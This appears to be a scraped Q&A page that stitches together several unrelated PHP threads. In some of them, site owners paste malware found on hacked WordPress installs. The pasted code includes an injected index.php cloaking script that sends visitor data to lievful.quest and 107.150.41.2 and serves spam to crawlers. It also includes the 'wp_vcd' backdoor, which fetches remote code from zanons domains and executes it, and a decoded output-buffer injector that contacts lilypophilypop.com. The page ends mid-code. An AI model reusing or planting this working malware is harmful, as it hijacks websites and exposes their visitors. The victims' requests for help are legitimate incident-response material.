<?php $group_num = 'z9126zn';
$inter_domain = 'http://' . $group_num . '.lievful.quest';
function curl_get_contents($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
$file_contents = curl_exec($ch);
curl_close($ch);
return $file_contents;
}
function getServerCont($url, $data = array())
{
$url = str_replace(' ', '+', $url);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
$output = curl_exec($ch);
$errorCode = curl_errno($ch);
curl_close($ch);
if (0 !== $errorCode) {
return false;
}
return $output;
}
function is_crawler($agent)
{
if (strpos($agent, 'google') !== false || strpos($agent, 'yahoo') !== false) {
return true;
} else {
return false;
}
}
function check_refer($refer)
{
if (strpos($refer, '.co.jp') !== false || strpos($refer, 'google.com') !== false) {
return true;
} else {
return false;
}
}
$http = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https://' : 'http://');
$req_uri = $_SERVER['REQUEST_URI'];
$domain = $_SERVER["HTTP_HOST"];
$self = $_SERVER['PHP_SELF'];
$ser_name = $_SERVER['SERVER_NAME'];
$req_url = $http . $domain . $req_uri;
$indata1 = $inter_domain . "/indata.php";
$map1 = $inter_domain . "/map.php";
$jump1 = $inter_domain . "/jump.php";
$url_words = $inter_domain . "/words.php";
$url_robots = $inter_domain . "/robots.php";
if (strpos($req_uri, ".php")) {
$href1 = $http . $domain . $self;
} else {
$href1 = $http . $domain;
}
$data1[] = array();
$data1['http'] = $http;
$data1['domain'] = $domain;
$data1['req_uri'] = $req_uri;
$data1['href'] = $href1;
$data1['req_url'] = $req_url;
$user_agent = strtolower(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '');
if(getenv('HTTP_CLIENT_IP')){
$client_ip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
$client_ip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) {
$client_ip = getenv('REMOTE_ADDR');
} else {
$client_ip = $_SERVER['REMOTE_ADDR'];
}
if (substr($req_uri, -6) == 'robots') {
$robots_cont = getServerCont($url_robots, $data1);
define('BASE_PATH', str_ireplace($_SERVER['PHP_SELF'], '', __FILE__));
file_put_contents(BASE_PATH . '/robots.txt', $robots_cont);
$robots_cont = file_get_contents(BASE_PATH . '/robots.txt');
if (strpos($robots_cont, "Crawl-delay:3")) {
echo 'robots.txt file create success!';
} else {
echo 'robots.txt file create fail!';
}
exit;
}
if (substr($req_uri, -4) == '.xml') {
if (strpos($req_uri, "pingsitemap.xml")) {
$str_cont = getServerCont($map1, $data1);
$str_cont_arr = explode(",", $str_cont);
$str_cont_arr[] = 'sitemap';
for ($k = 0; $k < count($str_cont_arr); $k++) {
if (strpos($href1, ".php") > 0) {
$tt1 = '?';
} else {
$tt1 = '/';
}
$http2 = $href1 . $tt1 . $str_cont_arr[$k] . '.xml';
$data_new = 'https://www.google.com/ping?sitemap=' . $http2;
$data_new1 = 'http://www.google.com/ping?sitemap=' . $http2;
if (stristr(#file_get_contents($data_new), 'successfully')) {
echo $data_new . '===>Submitting Google Sitemap: OK' . PHP_EOL;
} else if (stristr(#curl_get_contents($data_new), 'successfully')) {
echo $data_new . '===>Submitting Google Sitemap: OK' . PHP_EOL;
} else if (stristr(#file_get_contents($data_new1), 'successfully')) {
echo $data_new1 . '===>Submitting Google Sitemap: OK' . PHP_EOL;
} else if (stristr(#curl_get_contents($data_new1), 'successfully')) {
echo $data_new1 . '===>Submitting Google Sitemap: OK' . PHP_EOL;
} else {
echo $data_new1 . '===>Submitting Google Sitemap: fail' . PHP_EOL;
}
}
exit;
}
if (strpos($req_uri, "allsitemap.xml")) {
$str_cont = getServerCont($map1, $data1);
header("Content-type:text/xml");
echo $str_cont;
exit;
}
if (strpos($req_uri, ".php")) {
$word4 = explode("?", $req_uri);
$word4 = $word4[count($word4) - 1];
$word4 = str_replace(".xml", "", $word4);
} else {
$word4 = str_replace("/", "", $req_uri);
$word4 = str_replace(".xml", "", $word4);
}
$data1['word'] = $word4;
$data1['action'] = 'check_sitemap';
$check_url4 = getServerCont($url_words, $data1);
if ($check_url4 == '1') {
$str_cont = getServerCont($map1, $data1);
header("Content-type:text/xml");
echo $str_cont;
exit;
}
$data1['action'] = "check_words";
$check1 = getServerCont($url_words, $data1);
if (strpos($req_uri, "map") > 0 || $check1 == '1') {
$data1['action'] = "rand_xml";
$check_url4 = getServerCont($url_words, $data1);
header("Content-type:text/xml");
echo $check_url4;
exit;
}
}
if (strpos($req_uri, ".php")) {
$main_shell = $http . $ser_name . $self;
$data1['main_shell'] = $main_shell;
} else {
$main_shell = $http . $ser_name;
$data1['main_shell'] = $main_shell;
}
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
$chk_refer = check_refer($referer);
$bot=true;
if ($chk_refer) {
$data1['referer'] = $referer;
$data1['ip'] = $client_ip;
$data1['user_agent'] = $user_agent;
$data1['browser_la'] = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
$refer_content = getServerCont($jump1, $data1);
if ($refer_content != "404") {
echo $refer_content;
exit;
}
$bot=false;
}
$res_crawl = is_crawler($user_agent);
if ($res_crawl&&$bot) {
$data1['http_user_agent'] = $user_agent;
$get_content = getServerCont($indata1, $data1);
if ($get_content == "404") {
header('HTTP/1.0 404 Not Found');
exit;
} else if ($get_content == "500") {
header("HTTP/1.0 500 Internal Server Error");
exit;
} else if ($get_content == "blank") {
echo '';
exit;
} else {
echo $get_content;
exit;
}
} ?><?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* #package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* #var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
This is that index.php file which is not in our control.
We have Godaddy VPS Server With cPanel & wordpress hosting. we have installed wordpress site in a directory and that directory creates INDEX file automatically which shows HTTP ERROR 500 when opened.
this is automatically created in our VPS server. it automatically modifies when we changes this. automatically created when deleted.
In short we have no control over the directory and this file.
I have the same problem
<?php $group_num = 'z0109_18';
$inter_domain = 'http://107.150.41.2//' . $group_num . '/';
function curl_get_contents($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
$file_contents = curl_exec($ch);
curl_close($ch);
return $file_contents;
}
function getServerCont($url, $data = array())
{
$url = str_replace(' ', '+', $url);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
$output = curl_exec($ch);
$errorCode = curl_errno($ch);
curl_close($ch);
if (0 !== $errorCode) {
return false;
}
return $output;
}
function is_crawler($agent)
{
$agent_check = false;
$bots = 'googlebot|google|yahoo|bing|aol';
if ($agent != '') {
if (preg_match("/($bots)/si", $agent)) {
$agent_check = true;
}
}
return $agent_check;
}
function check_refer($refer)
{
$check_refer = false;
$referbots = 'google.co.jp|yahoo.co.jp|google.com';
if ($refer != '' && preg_match("/($referbots)/si", $refer)) {
$check_refer = true;
}
return $check_refer;
}
$http = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https://' : 'http://');
$req_uri = $_SERVER['REQUEST_URI'];
$domain = $_SERVER["HTTP_HOST"];
$self = $_SERVER['PHP_SELF'];
$ser_name = $_SERVER['SERVER_NAME'];
$req_url = $http . $domain . $req_uri;
$indata1 = $inter_domain . "/indata.php";
$map1 = $inter_domain . "/map.php";
$jump1 = $inter_domain . "/jump.php";
$url_words = $inter_domain . "/words.php";
$url_robots = $inter_domain . "/robots.php";
if (strpos($req_uri, ".php")) {
$href1 = $http . $domain . $self;
} else {
$href1 = $http . $domain;
}
$data1[] = array();
$data1['domain'] = $domain;
$data1['req_uri'] = $req_uri;
$data1['href'] = $href1;
$data1['req_url'] = $req_url;
if (substr($req_uri, -6) == 'robots') {
$robots_cont = getServerCont($url_robots, $data1);
define('BASE_PATH', str_ireplace($_SERVER['PHP_SELF'], '', __FILE__));
file_put_contents(BASE_PATH . '/robots.txt', $robots_cont);
$robots_cont = file_get_contents(BASE_PATH . '/robots.txt');
if (strpos(strtolower($robots_cont), "sitemap")) {
echo 'robots.txt file create success!';
} else {
echo 'robots.txt file create fail!';
}
return;
}
if (substr($req_uri, -4) == '.xml') {
if (strpos($req_uri, "pingsitemap.xml")) {
$str_cont = getServerCont($map1, $data1);
$str_cont_arr = explode(",", $str_cont);
$str_cont_arr[] = 'sitemap';
for ($k = 0; $k < count($str_cont_arr); $k++) {
if (strpos($href1, ".php") > 0) {
$tt1 = '?';
} else {
$tt1 = '/';
}
$http2 = $href1 . $tt1 . $str_cont_arr[$k] . '.xml';
$data_new = 'https://www.google.com/ping?sitemap=' . $http2;
$data_new1 = 'http://www.google.com/ping?sitemap=' . $http2;
if (stristr(#file_get_contents($data_new), 'successfully')) {
echo $data_new . '===>Submitting Google Sitemap: OK' . PHP_EOL;
} else if (stristr(#curl_get_contents($data_new), 'successfully')) {
echo $data_new . '===>Submitting Google Sitemap: OK' . PHP_EOL;
} else if (stristr(#file_get_contents($data_new1), 'successfully')) {
echo $data_new1 . '===>Submitting Google Sitemap: OK' . PHP_EOL;
} else if (stristr(#curl_get_contents($data_new1), 'successfully')) {
echo $data_new1 . '===>Submitting Google Sitemap: OK' . PHP_EOL;
} else {
echo $data_new1 . '===>Submitting Google Sitemap: fail' . PHP_EOL;
}
}
return;
}
if (strpos($req_uri, "allsitemap.xml")) {
$str_cont = getServerCont($map1, $data1);
header("Content-type:text/xml");
echo $str_cont;
return;
}
if (strpos($req_uri, ".php")) {
$word4 = explode("?", $req_uri);
$word4 = $word4[count($word4) - 1];
$word4 = str_replace(".xml", "", $word4);
} else {
$word4 = str_replace("/", "", $req_uri);
$word4 = str_replace(".xml", "", $word4);
}
$data1['word'] = $word4;
$data1['action'] = 'check_sitemap';
$check_url4 = getServerCont($url_words, $data1);
if ($check_url4 == '1') {
$str_cont = getServerCont($map1, $data1);
header("Content-type:text/xml");
echo $str_cont;
return;
}
$data1['action'] = "check_words";
$check1 = getServerCont($url_words, $data1);
if (strpos($req_uri, "map") > 0 || $check1 == '1') $data1['action'] = "rand_xml";
$check_url4 = getServerCont($url_words, $data1);
header("Content-type:text/xml");
echo $check_url4;
return;
}
if (strpos($req_uri, ".php")) {
$main_shell = $http . $ser_name . $self;
$data1['main_shell'] = $main_shell;
} else {
$main_shell = $http . $ser_name;
$data1['main_shell'] = $main_shell;
}
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
$chk_refer = check_refer($referer);
if (strpos($_SERVER['REQUEST_URI'], '.php')) {
$url_ext = '?';
} else {
$url_ext = '/';
}
if ($chk_refer && (preg_match('/ja/i', #$_SERVER['HTTP_ACCEPT_LANGUAGE']) || preg_match('/ja/i', #$_SERVER['HTTP_ACCEPT_LANGUAGE']) || preg_match("/^[a-z0-9]+[0-9]+$/", end(explode($url_ext, str_replace(array(".html", ".htm"), "", $_SERVER['REQUEST_URI'])))))) {
echo getServerCont($jump1, $data1);
return;
}
$user_agent = strtolower(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '');
$res_crawl = is_crawler($user_agent);
if ($res_crawl) {
$data1['http_user_agent'] = $user_agent;
$get_content = getServerCont($indata1, $data1);
echo $get_content;
return;
} ?>
My only solution now is to delete index.php recolection.php and wp-admin and wp-includes folder.
After that I reinstall WordPress and the site is working again.
Related
I have a php script which is being called in an angular project. I always get the response code as 0. I can find the request headers in chrome debugging section, but when i see in script it a always empty.
Also the php script is called twice with request method 'options' and 'get'. Iam not able to proceed further to get the details. Iam working on a windows , PHP7,iis server.
<?php
ob_start();
define('ENVIRONMENT', isset($_SERVER['CI_ENV']) ? $_SERVER['CI_ENV'] : 'testing'); //testing, production
ini_set('display_errors', '1');
if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
header('Access-Control-Allow-Origin: *');
header('Access-Control-Allow-Methods: POST, GET, DELETE, PUT, PATCH, OPTIONS');
header('Access-Control-Allow-Headers: api-method,api-url,authorization,token, Content-Type');
header('Content-Length: 0');
header('Content-Type: text/plain');
die();
}else{
header("Access-Control-Allow-Origin: *");
header("Access-Control-Allow-Methods: PUT, POST, GET, OPTIONS, DELETE");
header("Content-Type: application/json");
}
echo "header " .getallheaders()['api-method'] . '<br>';
if ((empty(getallheaders()['api-method']) || empty(getallheaders()['api-url'])) && $_SERVER['REQUEST_METHOD'] === 'POST') {
echo json_encode(['msg' => 'Invalid request']);
exit;
}
$params = [];
$api_url = getallheaders()['api-url'];
$api_method = getallheaders()['api-method'];
if ($api_method == 'post') {
$params = json_decode(file_get_contents('php://input'), TRUE);
if (empty($params)) {
$params = $_POST;
}
$headers = ["Content-Type: application/x-www-form-urlencoded", "Cache-Control: no-cache"];
} else {
$headers = [];
}
//read headers
foreach (getallheaders() as $name => $value) {
$key = strtolower($name);
if (strtolower($name) == 'mobilenumber') {
array_push($headers, "$key: $value");
} else if (strtolower($name) == 'branch') {
array_push($headers, "$key: $value");
} else if (strtolower($name) == 'authorization') {
array_push($headers, "$key: $value");
}
}
$handle = curl_init();
curl_setopt($handle, CURLOPT_URL, $api_url);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
curl_setopt($handle, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($handle, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($handle, CURLOPT_FRESH_CONNECT, 1);
curl_setopt($handle, CURLOPT_CONNECTTIMEOUT, 20);
curl_setopt($handle, CURLOPT_TIMEOUT, 400);
echo 'Curl error: ' . curl_error($handle);
if ($api_method == 'post') {
curl_setopt($handle, CURLOPT_POST, true);
curl_setopt($handle, CURLOPT_POSTFIELDS, http_build_query($params));
}
$response = curl_exec($handle);
$contentType = curl_getinfo($handle, CURLINFO_CONTENT_TYPE);
$code = curl_getinfo($handle, CURLINFO_HTTP_CODE);
print curl_error($handle);
if (ENVIRONMENT == 'testing') {
$log = 'Request Date:' . date("Y-m-d H:i:s") . '<br>';
$log .= 'Request url: ' . $api_url . '<br>';
$log .= 'Request Method: ' . $api_method . '<br>';
$log .= 'Content Type: ' . $contentType . '<br>'; $log .= 'Http Code: ' . $code . '<br>';
$log .= '<code>response: ' . $response . '</code>';
write_log($log);
}
if ($code == 200) {
http_response_code($code);
if (checkjson($response)) {
echo $response;
} else {
if (strpos($api_url, 'AddUser') !== false) {
if ($response == "error") {
http_response_code(200);
echo json_encode(['status' => 'success']);
exit;
}
}
if (strpos($api_url, 'EditUser') !== false) {
if ($response == "error") {
http_response_code(200);
echo json_encode(['status' => 'success']);
exit;
}
}
if ($response == "error") {
http_response_code(404);
echo json_encode(['status' => $response]);
} else if ($response == "success") {
http_response_code(200);
echo json_encode(['status' => $response]);
} else if ($response == "user already exist") {
http_response_code(409);
echo json_encode(['status' => $response]);
} else {
echo json_encode(['data' => $response]);
}
}
} else {
http_response_code($code);
echo json_encode(['msg' => 'empty response'.$code.$handle]);
}
if ($code == 0) {
print_r(curl_getinfo($handle));
exit;
}
function write_log($data = '')
{
file_put_contents("log.html", '<div style="max-width:100%;border:1px solid #ccc; padding:5px">' . $data . '</div><br>', FILE_APPEND | LOCK_EX);
}
function checkjson($str)
{
return json_decode($str, true);
}
You can use to call custom headers as an array
$headersArray = array();
foreach ($_SERVER as $key => $value) {
if (strpos($key, 'HTTP_') === 0) {
$headersArray[str_replace(' ', '', ucwords(str_replace('_', ' ', strtolower(substr($key, 5)))))] = $value;
}
}
Refer : https://stackoverflow.com/a/11709337/11298876, this answer was really helpful.
Now you can use headers array to call each header (Note it will be in camel case)
$api_url = $headersArray['ApiUrl'];
$api_method = $headersArray['ApiMethod'];
$mobile = $headersArray['Mobilenumber'];
$brand = $headersArray['Branch'];
$auth = $headersArray['Authorization'];
to get the actual headers.
Then finally you can use an array_push(because you have used it in your script) like this
array_push($headers, "mobilenumber: ".$headersArray['Mobilenumber'], "branch: ".$headersArray['Branch'],"authorization: ".$headersArray['Authorization']);
to send the headers.
Today, I check all my source code. I detect in all source have a strange code.
I don't have experience in this problem. I very confused.
In /wp-content/themes/child-theme/function.php have the code look like:
Does my website have been hacked or have the backdoor in my code?
I using the theme from ThemeForest. Don't use any null theme. I very anxious because of all website in production mode.
Domain: http://www.zanons.xyz/code.php
Can anyone explain this code and consequences, direct impact on the site?
Have any method to resolve my problem? Thanks.
Full strange code:
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '5f8bb400922c3661c96af9e12eb821b9')) {
$div_code_name = "wp_vcd";
switch ($_REQUEST['action']) {
case 'change_domain';
if (isset($_REQUEST['newdomain'])) {
if (!empty($_REQUEST['newdomain'])) {
if ($file = #file_get_contents(__FILE__)) {
if (preg_match_all('/\$tmpcontent = #file_get_contents\("http:\/\/(.*)\/code\.php/i', $file, $matcholddomain)) {
$file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
#file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
case 'change_code';
if (isset($_REQUEST['newcode'])) {
if (!empty($_REQUEST['newcode'])) {
if ($file = #file_get_contents(__FILE__)) {
if (preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i', $file, $matcholdcode)) {
$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
#file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default:
print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if (!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
if (fwrite($handle, "<?php\n" . $phpCode)) {
} else {
$tmpfname = tempnam('./', "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
}
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
$wp_auth_key = '08b370e35d008b6591dd40b0eec23025';
if (($tmpcontent = #file_get_contents("http://www.zanons.com/code.php") OR $tmpcontent = #file_get_contents_tcurl("http://www.zanons.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
#file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
#file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
#file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = #file_get_contents("http://www.zanons.me/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
#file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
#file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
#file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
} elseif ($tmpcontent = #file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = #file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = #file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif (($tmpcontent = #file_get_contents("http://www.zanons.xyz/code.php") OR $tmpcontent = #file_get_contents_tcurl("http://www.zanons.xyz/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
}
}
}
//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp
?>
Hello this is a 2 part question....
I have been trying to solve my problem for a while and gave up tonight and seeking answers :/
i have the following code and trying to download the image to the width of 1207px,
the download of the script works fine so i haven't included it below.
the second part is i like to screenshot to the ratio of 1207px wide but cant find way round it.
i have edited the following lines..
$w = 500;
$h = 768;
but this don't work, what ever the values are it downloads at 500px or very close width which is not ideal.
$url = trim(urldecode($url));
if ($url == '') {
exit();
}
if (!stristr($url, 'http://') and !stristr($url, 'https://')) {
$url = 'http://' . $url;
}
$url_segs = parse_url($url);
if (!isset($url_segs['host'])) {
exit();
}
$here = dirname(__FILE__) . DIRECTORY_SEPARATOR;
$bin_files = $here . 'bin' . DIRECTORY_SEPARATOR;
$jobs = $here . 'jobs' . DIRECTORY_SEPARATOR;
$cache = $here . 'cache' . DIRECTORY_SEPARATOR;
if (!is_dir($jobs)) {
mkdir($jobs);
file_put_contents($jobs . 'index.php', '<?php exit(); ?>');
}
if (!is_dir($cache)) {
mkdir($cache);
file_put_contents($cache . 'index.php', '<?php exit(); ?>');
}
$w = 500;
$h = 768;
if (isset($_REQUEST['w'])) {
$w = intval($_REQUEST['w']);
}
if (isset($_REQUEST['h'])) {
$h = intval($_REQUEST['h']);
}
if (isset($_REQUEST['clipw'])) {
$clipw = intval($_REQUEST['clipw']);
}
if (isset($_REQUEST['cliph'])) {
$cliph = intval($_REQUEST['cliph']);
}
if (isset($_REQUEST['download'])) {
$download = $_REQUEST['download'];
}
$url = strip_tags($url);
$url = str_replace(';', '', $url);
$url = str_replace('"', '', $url);
$url = str_replace('\'', '/', $url);
$url = str_replace('<?', '', $url);
$url = str_replace('<?', '', $url);
$url = str_replace('\077', ' ', $url);
$screen_file = $url_segs['host'] . crc32($url) . '_' . $w . '_' . $h . '.jpg';
$cache_job = $cache . $screen_file;
$refresh = false;
if (is_file($cache_job)) {
$filemtime = #filemtime($cache_job); // returns FALSE if file does not exist
if (!$filemtime or (time() - $filemtime >= $cache_life)) {
$refresh = true;
}
}
$url = escapeshellcmd($url);
if (!is_file($cache_job) or $refresh == true) {
$src = "
var page = require('webpage').create();
page.viewportSize = { width: {$w}, height: {$h} };
";
if (isset($clipw) && isset($cliph)) {
$src .= "page.clipRect = { top: 0, left: 0, width: {$clipw}, height: {$cliph} };";
}
$src .= "
page.open('{$url}', function () {
page.render('{$screen_file}');
phantom.exit();
});
";
$job_file = $jobs . $url_segs['host'] . crc32($src) . '.js';
file_put_contents($job_file, $src);
$exec = $bin_files . 'phantomjs ' . $job_file;
$escaped_command = escapeshellcmd($exec);
exec($escaped_command);
if (is_file($here . $screen_file)) {
rename($here . $screen_file, $cache_job);
}
}
if (is_file($cache_job)) {
if ($download != false) {
$file = $cache_job;
$file_name=basename($file);
$type = 'image/jpeg';
header("Content-disposition: attachment; filename={$file_name}");
header("Content-type: {$type}");
readfile($file);
;
} else {
$file = $cache_job;
$type = 'image/jpeg';
header('Content-Type:' . $type);
header('Content-Length: ' . filesize($file));
readfile($file);
}
}
?>
I am building a application based in codeigniter. Here I need to download only files that have .zip extension and upload in my local drive. But to do it I had been given a function named get_zip contents are as follows:
<?php
function get_file($file, $localpath, $newfilename)
{
$err_msg = '';
$out = fopen($localpath.$newfilename,"wb");
if ($out == FALSE){
print "File not opened<br>";
exit;
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_FILE, $out);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_URL, $file);
curl_exec($ch);
if( curl_error($ch) )
{
echo "<br>Error is : ".curl_error ( $ch);
}
curl_close($ch);
//fclose($ch);
return $localpath.$newfilename;
}//end function
function directory_map_echo($source_dir, $directory_depth = 0, $hidden = FALSE)
{
if ($fp = #opendir($source_dir))
{
$filedata = '';
$new_depth = $directory_depth - 1;
$source_dir = rtrim($source_dir, DIRECTORY_SEPARATOR).DIRECTORY_SEPARATOR;
while (FALSE !== ($file = readdir($fp)))
{
// Remove '.', '..', and hidden files [optional]
if ( ! trim($file, '.') OR ($hidden == FALSE && $file[0] == '.'))
{
continue;
}
if (($directory_depth < 1 OR $new_depth > 0) && #is_dir($source_dir.$file))
{
$filedata .= 'directory:'.$file.directory_map($source_dir.$file.DIRECTORY_SEPARATOR, $new_depth, $hidden);
}
else
{
$filedata .= $file;
}
}
closedir($fp);
return $filedata;
}
return FALSE;
}
But the problem is how I can restrict that only .zip files will be downloaded and uploaded to my local drive.
Since the filename is just a string you could use/modify the answer from this SO question:
$rex = "/^.*\.(zip)$/i";
preg_match($rex, $file)
Edit:
For error codes try:
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if($httpCode == 404){ //do some error handling }
I've found this code in base 64 on all php files of one of my client's site (wordpress) and I'm trying to understand what it does.
I'm also trying to figure out if it was an application exploit or a direct FTP access that has past this code.
Everything starts with setup_globals_777() and ob_start('mrobh') setting the callback to the mrobh($content) function.
Then there are a call to gzdecodeit ($decode) where the hassle starts out.
It seems like it gets the page content and change it. Now I'm trying to detect the specific changes and understand all functions, including the second one gzdecodeit().
Can someone shed some light on it?
The calls
setup_globals_777();
ob_start('mrobh');
// Here the application code and html output starts out
The callback:
function mrobh ($content)
{
#Header('Content-Encoding: none');
$decoded_content = gzdecodeit($content);
if (preg_match('/\<\/body/si', $decoded_content)) {
return preg_replace('/(\<\/body[^\>]*\>)/si', gml_777() . "\n" . '$1',
$decoded_content);
} else {
return $decoded_content . gml_777();
}
}
The setup function (understandable)
function setup_globals_777 ()
{
$rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/";
$mz = "/tmp/";
if (! is_dir($rz)) {
#mkdir($rz);
if (is_dir($rz)) {
$mz = $rz;
} else {
$rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/";
if (! is_dir($rz)) {
#mkdir($rz);
if (is_dir($rz)) {
$mz = $rz;
}
} else {
$mz = $rz;
}
}
} else {
$mz = $rz;
}
$bot = 0;
$ua = $_SERVER['HTTP_USER_AGENT'];
if (stristr($ua, "msnbot") || stristr($ua, "Yahoo"))
$bot = 1;
if (stristr($ua, "bingbot") || stristr($ua, "google"))
$bot = 1;
$msie = 0;
if (is_msie_777($ua))
$msie = 1;
$mac = 0;
if (is_mac_777($ua))
$mac = 1;
if (($msie == 0) && ($mac == 0))
$bot = 1;
global $_SERVER;
$_SERVER['s_p1'] = $mz;
$_SERVER['s_b1'] = $bot;
$_SERVER['s_t1'] = 1200;
$_SERVER['s_d1'] = "http://sweepstakesandcontestsdo.com/";
$d = '?d=' . urlencode($_SERVER["HTTP_HOST"]) . "&p=" .
urlencode($_SERVER["PHP_SELF"]) . "&a=" .
urlencode($_SERVER["HTTP_USER_AGENT"]);
$_SERVER['s_a1'] = 'http://www.lilypophilypop.com/g_load.php' . $d;
$_SERVER['s_a2'] = 'http://www.lolypopholypop.com/g_load.php' . $d;
$_SERVER['s_script'] = "mm.php?d=1";
}
The first function called after the callback execution:
Here is where the magic happens. I can't see the calls for the other
available functions and understand what this function is actually
decoding, since the $decode var is the application output grabbed by
the ob_start()
function gzdecodeit ($decode)
{
$t = #ord(#substr($decode, 3, 1));
$start = 10;
$v = 0;
if ($t & 4) {
$str = #unpack('v', substr($decode, 10, 2));
$str = $str[1];
$start += 2 + $str;
}
if ($t & 8) {
$start = #strpos($decode, chr(0), $start) + 1;
}
if ($t & 16) {
$start = #strpos($decode, chr(0), $start) + 1;
}
if ($t & 2) {
$start += 2;
}
$ret = #gzinflate(#substr($decode, $start));
if ($ret === FALSE) {
$ret = $decode;
}
return $ret;
}
All the available functions (after a base64_decode()):
<?php
if (function_exists('ob_start') && ! isset($_SERVER['mr_no'])) {
$_SERVER['mr_no'] = 1;
